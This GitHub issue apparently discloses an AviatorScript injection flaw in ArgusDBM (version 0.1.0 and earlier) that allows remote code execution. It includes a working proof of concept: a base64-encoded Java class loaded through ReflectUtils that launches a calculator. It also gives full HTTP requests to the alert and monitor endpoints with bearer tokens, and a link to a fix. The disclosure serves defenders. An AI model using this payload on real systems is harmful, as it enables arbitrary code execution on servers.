ArgusDBM icon indicating copy to clipboard operation
ArgusDBM copied to clipboard
verified publisher icon zmops

AviatorScript Inject RCE

Open AfterSnows opened this issue 1 year ago • 1 comments

Description

Version of the vulnerability

<=0.1.0

In CalculateAlarm.java, AviatorEvaluator is used to directly execute expression functionality without any configured security policies, leading to potential AviatorScript injection vulnerabilities (which by default can execute arbitrary static methods).

Description of the vulnerability.

For example, running the following AviatorScript script can lead to executing a command that pops up the calculator on Linux.

use org.springframework.util.ClassUtils;let loader = ClassUtils.getDefaultClassLoader();use org.springframework.util.Base64Utils;let str = Base64Utils.decodeFromString('yv66vgAAADQAIQoABwAUCgAVABYIABcKABUAGAcAGQcAGgcAGwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADTGE7AQAIPGNsaW5pdD4BAA1TdGFja01hcFRhYmxlBwAZAQAKU291cmNlRmlsZQEABmEuamF2YQwACAAJBwAcDAAdAB4BABBnbm9tZS1jYWxjdWxhdG9yDAAfACABABNqYXZhL2xhbmcvRXhjZXB0aW9uAQABYQEAEGphdmEvbGFuZy9PYmplY3QBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABgAHAAAAAAACAAEACAAJAAEACgAAAC8AAQABAAAABSq3AAGxAAAAAgALAAAABgABAAAAAwAMAAAADAABAAAABQANAA4AAAAIAA8ACQABAAoAAABPAAIAAQAAAA64AAISA7YABFenAARLsQABAAAACQAMAAUAAwALAAAAEgAEAAAABgAJAAgADAAHAA0ACQAMAAAAAgAAABAAAAAHAAJMBwARAAABABIAAAACABM');use org.springframework.cglib.core.ReflectUtils;ReflectUtils.defineClass('a',str,loader);

Steps to execute the vulnerability.

Access /api/alert/define to define threshold triggering expressions.

POST /api/alert/define HTTP/1.1
Host: xxxx:1159
Accept-Language: zh-CN,zh;q=0.9
Cookie: Admin-Token=eyJhbGciOiJIUzUxMiIsInppcCI6IkRFRiJ9.eJwljEsOwjAMRO_idSPVTYqTXgWxSFqDwqdFcYKQEHfHFct5M28-cK0ZJjhHGx1SMv28kHE9WuPDwZswB0uJ3ICYoANpScexXJpoyiKapBVeWcTU7carES4vLnsbK0xIGJwfA7oO-P38g5EGu4Oy3VkfjhCXR15VaSrD6fsDVnorAg.6OLcf8mmWvIc3kO8Y_pw5ayAjPy7tGEHRI4P6YE-uRgMiQx6Tq4XD78ceMvK3pkndtuvYNCD-JLXA6dQWWBdpA
Content-Type: application/json
Origin: http://xxxx:1159
Authorization: Bearer eyJhbGciOiJIUzUxMiIsInppcCI6IkRFRiJ9.eJwljEsOwjAMRO_idSPVTYqTXgWxSFqDwqdFcYKQEHfHFct5M28-cK0ZJjhHGx1SMv28kHE9WuPDwZswB0uJ3ICYoANpScexXJpoyiKapBVeWcTU7carES4vLnsbK0xIGJwfA7oO-P38g5EGu4Oy3VkfjhCXR15VaSrD6fsDVnorAg.6OLcf8mmWvIc3kO8Y_pw5ayAjPy7tGEHRI4P6YE-uRgMiQx6Tq4XD78ceMvK3pkndtuvYNCD-JLXA6dQWWBdpA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: application/json, text/plain, */*
Content-Length: 1155

{"cascadeValues":["mysql","status","com_insert"],"app":"mysql","metric":"status","field":"com_insert","preset":true,"expr":"use org.springframework.util.ClassUtils;let loader = ClassUtils.getDefaultClassLoader();use org.springframework.util.Base64Utils;let str = Base64Utils.decodeFromString('yv66vgAAADQAIQoABwAUCgAVABYIABcKABUAGAcAGQcAGgcAGwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADTGE7AQAIPGNsaW5pdD4BAA1TdGFja01hcFRhYmxlBwAZAQAKU291cmNlRmlsZQEABmEuamF2YQwACAAJBwAcDAAdAB4BABBnbm9tZS1jYWxjdWxhdG9yDAAfACABABNqYXZhL2xhbmcvRXhjZXB0aW9uAQABYQEAEGphdmEvbGFuZy9PYmplY3QBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABgAHAAAAAAACAAEACAAJAAEACgAAAC8AAQABAAAABSq3AAGxAAAAAgALAAAABgABAAAAAwAMAAAADAABAAAABQANAA4AAAAIAA8ACQABAAoAAABPAAIAAQAAAA64AAISA7YABFenAARLsQABAAAACQAMAAUAAwALAAAAEgAEAAAABgAJAAgADAAHAA0ACQAMAAAAAgAAABAAAAAHAAJMBwARAAABABIAAAACABM');use org.springframework.cglib.core.ReflectUtils;ReflectUtils.defineClass('a',str,loader);","priority":2,"times":10,"enable":true,"template":"${com_insert}"}

Access /api/monitor to add website monitoring.

POST /api/monitor HTTP/1.1
Host: xxxx:1159
Accept-Encoding: gzip, deflate
Content-Type: application/json
Cookie: Admin-Token=eyJhbGciOiJIUzUxMiIsInppcCI6IkRFRiJ9.eJwljNsOwiAQRP9ln0sC5Vb6K6YPW7sYvFDDgjEx_rs0Ps6ZOfOBa00wgx5DDOe4CYuohHG4CjRWCZRaSxy9dXGCAbitfYzl0rinxNwTt0KZmEXdb5QFU3lROVqsMCuvgpmM83IAej__wHolD1D2O_WHE-D2SLkrrcuwfH-U9yuC.3gQ-tWEyNzo9ObMXH3R_MF2B13n4oDYQikHBoShg219qEJ-txLjV5Bd9DHOQTIHNT4ojZfEONl-cx-g7xmOUAw
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Referer: http://172.20.10.5:1159/
Accept-Language: zh-CN,zh;q=0.9
Authorization: Bearer eyJhbGciOiJIUzUxMiIsInppcCI6IkRFRiJ9.eJwljNsOwiAQRP9ln0sC5Vb6K6YPW7sYvFDDgjEx_rs0Ps6ZOfOBa00wgx5DDOe4CYuohHG4CjRWCZRaSxy9dXGCAbitfYzl0rinxNwTt0KZmEXdb5QFU3lROVqsMCuvgpmM83IAej__wHolD1D2O_WHE-D2SLkrrcuwfH-U9yuC.3gQ-tWEyNzo9ObMXH3R_MF2B13n4oDYQikHBoShg219qEJ-txLjV5Bd9DHOQTIHNT4ojZfEONl-cx-g7xmOUAw
Origin: http://172.20.10.5:1159
Content-Length: 376

{"monitor":{"name":"2","intervals":600,"tags":[],"description":"1","app":"mysql","host":"localhost"},"params":[{"field":"host","value":"localhost"},{"field":"port","value":"3306"},{"field":"timeout","value":"6000"},{"field":"database","value":"test"},{"field":"username","value":"t"},{"field":"password","value":"123456"},{"field":"url","value":"localhost"}],"detected":true}

Perform operations to trigger monitoring. For example, here I select MySQL's insert operation to trigger monitoring.

Vulnerability validation

image-20240627201934976 image-20240627202010340

Task List

No response

AfterSnows avatar Jun 27 '24 12:06 AfterSnows

Suggestions on how to fix this vulnerability: https://github.com/apache/hertzbeat/commit/8dcf050e27ca95d15460a7ba98a3df8a9cd1d3d2

AfterSnows avatar Jun 27 '24 12:06 AfterSnows